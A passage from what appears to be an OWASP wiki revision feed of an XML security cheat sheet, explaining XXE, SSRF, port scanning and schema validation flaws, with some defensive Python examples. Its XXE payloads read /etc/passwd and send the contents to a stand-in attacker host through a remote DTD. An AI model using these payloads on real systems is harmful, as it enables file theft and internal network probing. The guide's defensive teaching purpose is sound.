The previous XML defines an external entity named &amp;lt;tt&amp;gt;xxe&amp;lt;/tt&amp;gt; whose replacement text is the contents of &amp;lt;tt&amp;gt;/etc/passwd&amp;lt;/tt&amp;gt;; the entity is expanded within the &amp;lt;tt&amp;gt;root&amp;lt;/tt&amp;gt; element. If the parser allows references to external entities, it might include the contents of that file in the XML response or in the error output. &lt;br /&gt;
&lt;br /&gt;
=== Server Side Request Forgery ===&lt;br /&gt;
Server Side Request Forgery (SSRF) happens when the server receives a malicious XML schema that makes it retrieve remote resources, such as a file over HTTP, HTTPS, or FTP. SSRF has been used to retrieve remote files, to prove an XXE when the file cannot be reflected back, to perform port scanning, and to perform brute force attacks on internal networks.&lt;br /&gt;
&lt;br /&gt;
==== External Connection ====&lt;br /&gt;
Whenever there is an XXE and you cannot retrieve a file, you can test if you would be able to establish remote connections:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE root [ &lt;br /&gt;
  &amp;lt;!ENTITY % xxe SYSTEM &amp;quot;http://attacker/evil.dtd&amp;quot;&amp;gt; &lt;br /&gt;
  %xxe;&lt;br /&gt;
]&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== File Retrieval with Parameter Entities ====&lt;br /&gt;
Parameter entities allow for the retrieval of content using URL references. Consider the following malicious XML document:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;utf-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ENTITY % file SYSTEM &amp;quot;file:///etc/passwd&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY % dtd SYSTEM &amp;quot;http://attacker/evil.dtd&amp;quot;&amp;gt;&lt;br /&gt;
  %dtd;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;root&amp;gt;&amp;amp;send;&amp;lt;/root&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Here the DTD defines two external parameter entities: &amp;lt;tt&amp;gt;file&amp;lt;/tt&amp;gt;, which loads a local file, and &amp;lt;tt&amp;gt;dtd&amp;lt;/tt&amp;gt;, which loads a remote DTD. The remote DTD should contain something like this:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!ENTITY % all &amp;quot;&amp;lt;!ENTITY send SYSTEM 'http://example.com/?%file;'&amp;gt;&amp;quot;&amp;gt;&lt;br /&gt;
%all;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The second DTD causes the system to send the contents of the &amp;lt;tt&amp;gt;file&amp;lt;/tt&amp;gt; back to the attacker's server as a parameter of the URL. &lt;br /&gt;
&lt;br /&gt;
==== Port Scanning ====&lt;br /&gt;
The amount and type of information will depend on the type of implementation. Responses can be classified as follows, ranking from easy to complex:&lt;br /&gt;
&lt;br /&gt;
''' 1) Complete Disclosure '''&lt;br /&gt;
This is the simplest and most unusual scenario. With complete disclosure, you can clearly see what is going on because you receive the complete responses from the server being queried. You have an exact representation of what happened when connecting to the remote host.&lt;br /&gt;
&lt;br /&gt;
''' 2) Error-based '''&lt;br /&gt;
If you are unable to see the response from the remote server, you may be able to use the error response. Consider a web service leaking details on what went wrong in the SOAP Fault element when trying to establish a connection: &lt;br /&gt;
 &amp;lt;pre&amp;gt;java.io.IOException: Server returned HTTP response code: 401 for URL: http://192.168.1.1:80&lt;br /&gt;
	at sun.net.www.protocol.http.HttpURLConnection.getInputStream(HttpURLConnection.java:1459)&lt;br /&gt;
	at com.sun.org.apache.xerces.internal.impl.XMLEntityManager.setupCurrentEntity(XMLEntityManager.java:674)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''' 3) Timeout-based '''&lt;br /&gt;
Timeouts could occur when connecting to open or closed ports, depending on the schema and the underlying implementation. If the timeouts occur while you are trying to connect to a closed port (which may take one minute), the response time when connecting to an open port will be very short (one second, for example). The difference between open and closed ports becomes quite clear.&lt;br /&gt;
&lt;br /&gt;
''' 4) Time-based '''&lt;br /&gt;
Sometimes the differences between closed and open ports are very subtle. The only way to know the status of a port with certainty would be to take multiple measurements of the time required to reach each host, and then analyze the average time for each port to determine its status. This type of attack will be difficult to accomplish in higher latency networks.&lt;br /&gt;
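&lt;br /&gt;
The averaging step can be sketched in Python as follows. The sketch works only on timings that have already been collected; the sample values, the threshold, and the assumption that slow responses mean closed ports are all made up for illustration and would need to be calibrated against the implementation being tested.&lt;br /&gt;

```python
from statistics import mean


def classify_ports(samples, threshold_seconds):
    """Label each port by comparing its mean response time with a threshold.

    `samples` maps a port number to a list of measured response times in
    seconds. Which side of the threshold means "open" depends on the target
    implementation; here slow responses are assumed to indicate closed ports.
    """
    result = {}
    for port, timings in samples.items():
        average = mean(timings)
        result[port] = "closed" if average > threshold_seconds else "open"
    return result


# Made-up measurements: three requests per port.
measurements = {
    80: [0.11, 0.09, 0.13],
    81: [0.52, 0.47, 0.55],
}
print(classify_ports(measurements, threshold_seconds=0.3))
# {80: 'open', 81: 'closed'}
```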
&lt;br /&gt;
==== Brute Forcing ====&lt;br /&gt;
Once an attacker confirms that it is possible to perform a port scan, performing a brute force attack is a matter of embedding the &amp;lt;tt&amp;gt;username&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;password&amp;lt;/tt&amp;gt; as part of the URI. For example:&lt;br /&gt;
 &amp;lt;pre&amp;gt;foo://username:password@example.com:8080/&amp;lt;/pre&amp;gt;&lt;br /&gt;
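&lt;br /&gt;
The credentials travel in the part of the URI that precedes the host name. As a quick check of how a client library would interpret the example above, the following Python sketch splits it with the standard &amp;lt;tt&amp;gt;urllib.parse&amp;lt;/tt&amp;gt; module; the &amp;lt;tt&amp;gt;foo&amp;lt;/tt&amp;gt; scheme is the placeholder from the example, not a real protocol.&lt;br /&gt;

```python
from urllib.parse import urlsplit

parts = urlsplit("foo://username:password@example.com:8080/")

print(parts.scheme)    # foo
print(parts.username)  # username
print(parts.password)  # password
print(parts.hostname)  # example.com
print(parts.port)      # 8080
```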
&lt;br /&gt;
=Authors and Primary Editors=&lt;br /&gt;
&lt;br /&gt;
[mailto:fernando.arnaboldi@ioactive.com Fernando Arnaboldi]&lt;/div&gt;</summary>
		<author><name>Fernando.arnaboldi</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=224429</id>
		<title>XML Security Cheat Sheet</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=224429"/>
				<updated>2016-12-21T20:17:04Z</updated>
		
		<summary type="html">&lt;p&gt;Fernando.arnaboldi: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Introduction ==&lt;br /&gt;
&lt;br /&gt;
Specifications for XML and XML schemas include multiple security flaws. At the same time, these specifications provide the tools required to protect XML applications. Even though we use XML schemas to define the security of XML documents, they can be used to perform a variety of attacks: file retrieval, server side request forgery, port scanning, or brute forcing. This cheat sheet exposes how to exploit the different possibilities in libraries and software divided in two sections:&lt;br /&gt;
* '''Malformed XML Documents''': vulnerabilities using not well formed documents.&lt;br /&gt;
* '''Invalid XML Documents''': vulnerabilities using documents that do not have the expected structure.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=  Malformed XML Documents =&lt;br /&gt;
The W3C XML specification defines a set of principles that XML documents must follow to be considered well formed. When a document violates any of these principles, it must be considered a fatal error and the data it contains is considered malformed. Multiple tactics will cause a malformed document: removing an ending tag, rearranging the order of elements into a nonsensical structure, introducing forbidden characters, and so on. The XML parser should stop execution once detecting a fatal error. The document should not undergo any additional processing, and the application should display an error message.&lt;br /&gt;
&lt;br /&gt;
The recommendation to avoid these vulnerabilities is to use an XML processor that follows W3C specifications and does not take significant additional time to process malformed documents. In addition, use only well-formed documents and validate the contents of each element and attribute to process only valid values within predefined boundaries.&lt;br /&gt;
&lt;br /&gt;
== More Time Required ==&lt;br /&gt;
A malformed document may affect the consumption of Central Processing Unit (CPU) resources. In certain scenarios, the amount of time required to process malformed documents may be greater than that required for well-formed documents. When this happens, an attacker may exploit an asymmetric resource consumption attack to take advantage of the greater processing time to cause a Denial of Service (DoS). &lt;br /&gt;
&lt;br /&gt;
To analyze the likelihood of this attack, analyze the time taken by a regular XML document vs the time taken by a malformed version of that same document. Then, consider how an attacker could use this vulnerability in conjunction with an XML flood attack using multiple documents to amplify the effect.&lt;br /&gt;
&lt;br /&gt;
== Applications Processing Malformed Data ==&lt;br /&gt;
Certain XML parsers have the ability to recover malformed documents. They can be instructed to try their best to return a valid tree with all the content that they can manage to parse, regardless of the document’s noncompliance with the specifications. Since there are no predefined rules for the recovery process, the approach and results may not always be the same. Using malformed documents might lead to unexpected issues related to data integrity.&lt;br /&gt;
&lt;br /&gt;
The following two scenarios illustrate attack vectors a parser will analyze in recovery mode:&lt;br /&gt;
&lt;br /&gt;
=== Malformed Document to Malformed Document ===&lt;br /&gt;
According to the XML specification, the string &amp;lt;tt&amp;gt;--&amp;lt;/tt&amp;gt; (double-hyphen) must not occur within comments. Using the recovery mode of lxml and PHP, the following document will remain the same after being recovered:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;element&amp;gt;&lt;br /&gt;
 &amp;lt;!-- one&lt;br /&gt;
  &amp;lt;!-- another comment&lt;br /&gt;
 comment --&amp;gt;&lt;br /&gt;
&amp;lt;/element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Well-Formed Document to Well-Formed Document Normalized ===&lt;br /&gt;
Certain parsers may consider normalizing the contents of your &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; sections. This means that they will update the special characters contained in the &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; section to contain the safe versions of these characters even though it is not required: &lt;br /&gt;
 &amp;lt;element&amp;gt;&lt;br /&gt;
  &amp;lt;![CDATA[&amp;lt;script&amp;gt;a=1;&amp;lt;/script&amp;gt;]]&amp;gt;&lt;br /&gt;
 &amp;lt;/element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Normalization of a &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; section is not a common rule among parsers. Libxml could transform this document to its canonical version, but although well formed, its contents may be considered malformed depending on the situation:&lt;br /&gt;
 &amp;lt;element&amp;gt;&lt;br /&gt;
  '''&amp;amp;amp;lt;script&amp;amp;amp;gt;a=1;&amp;amp;amp;lt;/script&amp;amp;amp;gt;'''&lt;br /&gt;
 &amp;lt;/element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Coercive Parsing ==&lt;br /&gt;
A coercive attack in XML involves parsing deeply nested XML documents without their corresponding ending tags. The idea is to make the victim use up —and eventually deplete— the machine’s resources and cause a denial of service on the target.&lt;br /&gt;
Reports of a DoS attack in Firefox 3.67 included the use of 30,000 open XML elements without their corresponding ending tags. Removing the closing tags simplified the attack since it requires only half of the size of a well-formed document to accomplish the same results. The number of tags being processed eventually caused a stack overflow. A simplified version of such a document would look like this: &lt;br /&gt;
 &amp;lt;A1&amp;gt;&lt;br /&gt;
  &amp;lt;A2&amp;gt; &lt;br /&gt;
   &amp;lt;A3&amp;gt;&lt;br /&gt;
    ...&lt;br /&gt;
     &amp;lt;A30000&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Violation of XML Specification Rules ==&lt;br /&gt;
Unexpected consequences may result from manipulating documents using parsers that do not follow W3C specifications. It may be possible to achieve crashes and/or code execution when the software does not properly verify how to handle incorrect XML structures. Feeding the software with fuzzed XML documents may expose this behavior. &lt;br /&gt;
&lt;br /&gt;
= Invalid XML Documents =&lt;br /&gt;
Attackers may introduce unexpected values in documents to take advantage of an application that does not verify whether the document contains a valid set of values. Schemas specify restrictions that help identify whether documents are valid. A valid document is well formed and complies with the restrictions of a schema, and more than one schema can be used to validate a document. These restrictions may appear in multiple files, either using a single schema language or relying on the strengths of the different schema languages.&lt;br /&gt;
&lt;br /&gt;
The recommendation to avoid these vulnerabilities is that each XML document must have a precisely defined XML Schema (not DTD) with every piece of information properly restricted to avoid problems of improper data validation. Use a local copy or a known good repository instead of the schema reference supplied in the XML document. Also, perform an integrity check of the XML schema file being referenced, bearing in mind the possibility that the repository could be compromised. In cases where the XML documents are using remote schemas, configure servers to use only secure, encrypted communications to prevent attackers from eavesdropping on network traffic.&lt;br /&gt;
&lt;br /&gt;
== Document without Schema ==&lt;br /&gt;
Consider a bookseller that uses a web service through a web interface to make transactions. The XML document for transactions is composed of two elements: an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; value related to an item and a certain &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt;. The user may only introduce a certain &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; value using the web interface:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;'''123'''&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
If there is no control on the document’s structure, the application could also process different well-formed messages with unintended consequences. The previous document could have contained additional tags to affect the behavior of the underlying application processing its contents:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;'''123&amp;lt;/id&amp;gt;&amp;lt;price&amp;gt;0&amp;lt;/price&amp;gt;&amp;lt;id&amp;gt;'''&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Notice again how the value 123 is supplied as an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt;, but now the document includes additional opening and closing tags. The attacker closes the &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; element and sets a bogus &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; element to the value 0. The final step to keep the structure well-formed is to add one empty &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; element. After this, the application adds the closing tag for &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; and sets the &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; to 10. If the application processes only the first values provided for the &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; and the &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; without performing any type of control on the structure, it could benefit the attacker by providing the ability to buy a book without actually paying for it.&lt;br /&gt;
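&lt;br /&gt;
The effect of reading only the first match can be reproduced with Python's standard &amp;lt;tt&amp;gt;xml.etree.ElementTree&amp;lt;/tt&amp;gt; module. In this sketch the tampered document is built programmatically rather than parsed from text, and the final structural check is a hand-written stand-in for what a schema would normally enforce; the variable names are illustrative.&lt;br /&gt;

```python
import xml.etree.ElementTree as ET

# Build the tampered document programmatically: the attacker-controlled id
# value has introduced an extra price element ahead of the legitimate one.
buy = ET.Element("buy")
ET.SubElement(buy, "id").text = "123"
ET.SubElement(buy, "price").text = "0"    # injected by the attacker
ET.SubElement(buy, "id")                  # empty id that keeps the markup balanced
ET.SubElement(buy, "price").text = "10"   # price set by the application

# A handler that reads only the first match picks the attacker's price.
first_price = buy.find("price").text
all_prices = [element.text for element in buy.findall("price")]

print(first_price)  # 0
print(all_prices)   # ['0', '10']

# A structural check, which a schema would normally enforce, rejects the message.
is_well_structured = [child.tag for child in buy] == ["id", "price"]
print(is_well_structured)  # False
```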
&lt;br /&gt;
== Unrestrictive Schema ==&lt;br /&gt;
Certain schemas do not offer enough restrictions for the type of data that each element can receive. This is what normally happens when using DTD; it has a very limited set of possibilities compared to the type of restrictions that can be applied in XML documents. This could expose the application to undesired values within elements or attributes that would be easy to constrain when using other schema languages. In the following example, a person’s &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; is validated against an inline DTD schema:&lt;br /&gt;
 &amp;lt;!DOCTYPE person [&lt;br /&gt;
  &amp;lt;!ELEMENT person (name, age)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT name (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT age (#PCDATA)&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;person&amp;gt;&lt;br /&gt;
  &amp;lt;name&amp;gt;John Doe&amp;lt;/name&amp;gt;&lt;br /&gt;
  &amp;lt;age&amp;gt;'''11111..(1,000,000 digits)..11111'''&amp;lt;/age&amp;gt;&lt;br /&gt;
 &amp;lt;/person&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous document contains an inline DTD with a root element named &amp;lt;tt&amp;gt;person&amp;lt;/tt&amp;gt;. This element contains two elements in a specific order: &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; and then &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;. The elements &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; are then each defined to contain &amp;lt;tt&amp;gt;PCDATA&amp;lt;/tt&amp;gt;. After this definition begins the well-formed and valid XML document. The element &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; contains an irrelevant value, but the &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; element contains one million digits. Since there are no restrictions on the maximum size for the &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; element, this one-million-digit string could be sent to the server for this element. Typically this type of element should be restricted to contain no more than a certain number of characters and constrained to a certain set of characters (for example, digits from 0 to 9, the + sign and the - sign).&lt;br /&gt;
If not properly restricted, applications may handle potentially invalid values contained in documents. Since it is not possible to indicate specific restrictions (a maximum length for the element &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; or a valid range for the element &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;), this type of schema increases the risk of affecting the integrity and availability of resources.&lt;br /&gt;
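&lt;br /&gt;
When the schema language cannot express such limits, the application has to enforce them itself. The following Python sketch shows one way to do so for the &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; value; the policy of one to three digits and a maximum of 150 is an assumption chosen for illustration, as are the names used.&lt;br /&gt;

```python
import re

# Assumed policy: one to three ASCII digits, value between 0 and 150.
AGE_PATTERN = re.compile(r"[0-9]{1,3}")
MAX_AGE = 150


def is_valid_age(text):
    """Check length and character set first, then the numeric range."""
    if AGE_PATTERN.fullmatch(text) is None:
        return False
    return MAX_AGE >= int(text)


print(is_valid_age("42"))           # True
print(is_valid_age("1" * 1000000))  # False
print(is_valid_age("-5"))           # False
```

Checking the pattern before converting to a number means the one-million-digit string is rejected without ever being parsed as an integer.&lt;br /&gt;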
&lt;br /&gt;
== Improper Data Validation == &lt;br /&gt;
When schemas are insecurely defined and do not provide strict rules, they may expose the application to diverse situations. The result of this could be the disclosure of internal errors or documents that hit the application’s functionality with unexpected values.&lt;br /&gt;
&lt;br /&gt;
=== String Data Types ===&lt;br /&gt;
If you need to use a hexadecimal value, there is no point in defining it as a string that will later be restricted to the 16 hexadecimal characters. As an example of this scenario, when using XML encryption, some values must be encoded using base64. This is the schema definition of how these values should look:&lt;br /&gt;
 &amp;lt;element name=&amp;quot;CipherData&amp;quot; type=&amp;quot;xenc:CipherDataType&amp;quot;/&amp;gt;&lt;br /&gt;
  &amp;lt;complexType name=&amp;quot;CipherDataType&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;choice&amp;gt;&lt;br /&gt;
    &amp;lt;element name=&amp;quot;CipherValue&amp;quot; type=&amp;quot;'''base64Binary'''&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;element ref=&amp;quot;xenc:CipherReference&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/choice&amp;gt;&lt;br /&gt;
  &amp;lt;/complexType&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous schema defines the element &amp;lt;tt&amp;gt;CipherValue&amp;lt;/tt&amp;gt; as a base64 data type. As an example, the IBM WebSphere DataPower SOA Appliance allowed any type of characters within this element after a valid base64 value and considered the result valid. The first portion of the data was properly checked as a base64 value, but the remaining characters could be anything else (including other sub-elements of the &amp;lt;tt&amp;gt;CipherData&amp;lt;/tt&amp;gt; element). The restrictions were only partially enforced for the element, which suggests that the information was checked by application code instead of the proposed sample schema. &lt;br /&gt;
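&lt;br /&gt;
A comparable leniency is easy to reproduce in application code. The following Python sketch does not model the appliance mentioned above; it only contrasts the default, permissive mode of the standard &amp;lt;tt&amp;gt;base64.b64decode&amp;lt;/tt&amp;gt; function with its strict mode (&amp;lt;tt&amp;gt;validate=True&amp;lt;/tt&amp;gt;). The helper names and the sample value are illustrative.&lt;br /&gt;

```python
import base64
import binascii


def decode_lenient(text):
    """Default behavior: characters outside the base64 alphabet are discarded."""
    return base64.b64decode(text)


def decode_strict(text):
    """Reject the whole value if any character is not valid base64."""
    try:
        return base64.b64decode(text, validate=True)
    except binascii.Error:
        return None


tampered = "QUJD!!!"  # valid base64 for ABC, followed by three invalid characters

print(decode_lenient(tampered))  # b'ABC'
print(decode_strict(tampered))   # None
print(decode_strict("QUJD"))     # b'ABC'
```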
&lt;br /&gt;
=== Numeric Data Types ===&lt;br /&gt;
Defining the correct data type for numbers can be more complex since there are more options than there are for strings. &lt;br /&gt;
&lt;br /&gt;
==== Negative and Positive Restrictions ====&lt;br /&gt;
XML Schema numeric data types can include different ranges of numbers. They could include:&lt;br /&gt;
* '''negativeInteger''': Only negative numbers&lt;br /&gt;
* '''nonNegativeInteger''': Positive numbers and the zero value&lt;br /&gt;
* '''positiveInteger''': Only positive numbers&lt;br /&gt;
* '''nonPositiveInteger''': Negative numbers and the zero value&lt;br /&gt;
The following sample document defines an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; for a product, a &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt;, and a &amp;lt;tt&amp;gt;quantity&amp;lt;/tt&amp;gt; value that is under the control of an attacker:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;1&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
  &amp;lt;quantity&amp;gt;'''1'''&amp;lt;/quantity&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
To avoid repeating old errors, an XML schema may be defined to prevent processing the incorrect structure in cases where an attacker wants to introduce additional elements:&lt;br /&gt;
 &amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;buy&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;'''xs:integer'''&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Limiting the &amp;lt;tt&amp;gt;quantity&amp;lt;/tt&amp;gt; to an integer data type will avoid any unexpected characters. Once the application receives the previous message, it may calculate the final price by doing &amp;lt;tt&amp;gt;price*quantity&amp;lt;/tt&amp;gt;. However, since this data type allows negative values, it might allow a negative result on the user’s account if an attacker provides a negative number. To avoid that logical vulnerability, the schema should probably use &amp;lt;tt&amp;gt;positiveInteger&amp;lt;/tt&amp;gt; instead of &amp;lt;tt&amp;gt;integer&amp;lt;/tt&amp;gt;. &lt;br /&gt;
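&lt;br /&gt;
The logical flaw is visible as soon as the calculation is written out. The following Python sketch computes &amp;lt;tt&amp;gt;price*quantity&amp;lt;/tt&amp;gt; and adds a rough application-side equivalent of the &amp;lt;tt&amp;gt;positiveInteger&amp;lt;/tt&amp;gt; check; the function names are hypothetical, and the check is looser than real schema validation because Python's &amp;lt;tt&amp;gt;int&amp;lt;/tt&amp;gt; accepts some forms the schema type would not.&lt;br /&gt;

```python
from decimal import Decimal


def order_total(price, quantity):
    """Compute price * quantity the way the text describes."""
    return Decimal(price) * int(quantity)


def is_positive_integer(text):
    """Rough equivalent of the positiveInteger value space: 1, 2, 3, ..."""
    try:
        return int(text) > 0
    except ValueError:
        return False


print(order_total("10", "1"))       # 10
print(order_total("10", "-5"))      # -50
print(is_positive_integer("-5"))    # False
print(is_positive_integer("0"))     # False
print(is_positive_integer("3"))     # True
```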
&lt;br /&gt;
==== Divide by Zero ====&lt;br /&gt;
Whenever user-controlled values are used as denominators in a division, developers should avoid allowing the number zero. In cases where the value zero is used for division in XSLT, the error &amp;lt;tt&amp;gt;FOAR0001&amp;lt;/tt&amp;gt; will occur. Other applications may throw other exceptions and the program may crash. Some XML Schema data types exclude the zero value. For example, in cases where negative values and zero are not considered valid, the schema could specify the data type &amp;lt;tt&amp;gt;positiveInteger&amp;lt;/tt&amp;gt; for the element. &lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;denominator&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;'''xs:positiveInteger'''&amp;quot;/&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The element &amp;lt;tt&amp;gt;denominator&amp;lt;/tt&amp;gt; is now restricted to positive integers. This means that only values greater than zero will be considered valid. If you see any other type of restriction being used, you may trigger an error if the denominator is zero.&lt;br /&gt;
&lt;br /&gt;
==== Special Values: Infinity and Not a Number (NaN) ====&lt;br /&gt;
The data types &amp;lt;tt&amp;gt;float&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;double&amp;lt;/tt&amp;gt; contain real numbers and some special values: &amp;lt;tt&amp;gt;-Infinity&amp;lt;/tt&amp;gt; or &amp;lt;tt&amp;gt;-INF&amp;lt;/tt&amp;gt;, &amp;lt;tt&amp;gt;NaN&amp;lt;/tt&amp;gt;, and &amp;lt;tt&amp;gt;+Infinity&amp;lt;/tt&amp;gt; or &amp;lt;tt&amp;gt;INF&amp;lt;/tt&amp;gt;. These possibilities may be useful to express certain values, but they are sometimes misused. The problem is that they are commonly used to express only real numbers such as prices. This is a common error seen in other programming languages, not solely restricted to these technologies.&lt;br /&gt;
Not considering the whole spectrum of possible values for a data type could make underlying applications fail. If the special values &amp;lt;tt&amp;gt;Infinity&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;NaN&amp;lt;/tt&amp;gt; are not required and only real numbers are expected, the data type &amp;lt;tt&amp;gt;decimal&amp;lt;/tt&amp;gt; is recommended:&lt;br /&gt;
 &amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;buy&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;'''xs:decimal'''&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:positiveInteger&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Because &amp;lt;tt&amp;gt;decimal&amp;lt;/tt&amp;gt; does not admit Infinity or NaN, a document that sets the price to either value fails validation and the value never reaches the application. An attacker can exploit this issue if those values are allowed.&lt;br /&gt;
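&lt;br /&gt;
A comparable check can be sketched on the application side. The Python example below is an assumption-laden illustration, not part of any schema processor: &amp;lt;tt&amp;gt;parse_price&amp;lt;/tt&amp;gt; is a hypothetical name, and Python's &amp;lt;tt&amp;gt;Decimal&amp;lt;/tt&amp;gt; is more permissive than the schema type &amp;lt;tt&amp;gt;decimal&amp;lt;/tt&amp;gt; (for instance, it accepts exponent notation), so it only approximates the schema behavior.&lt;br /&gt;

```python
from decimal import Decimal, InvalidOperation


def parse_price(text):
    # Decimal accepts "NaN" and "Infinity" as input, so finiteness must be
    # checked explicitly to reject the special values.
    try:
        value = Decimal(text.strip())
    except InvalidOperation:
        raise ValueError("not a decimal number: " + repr(text)) from None
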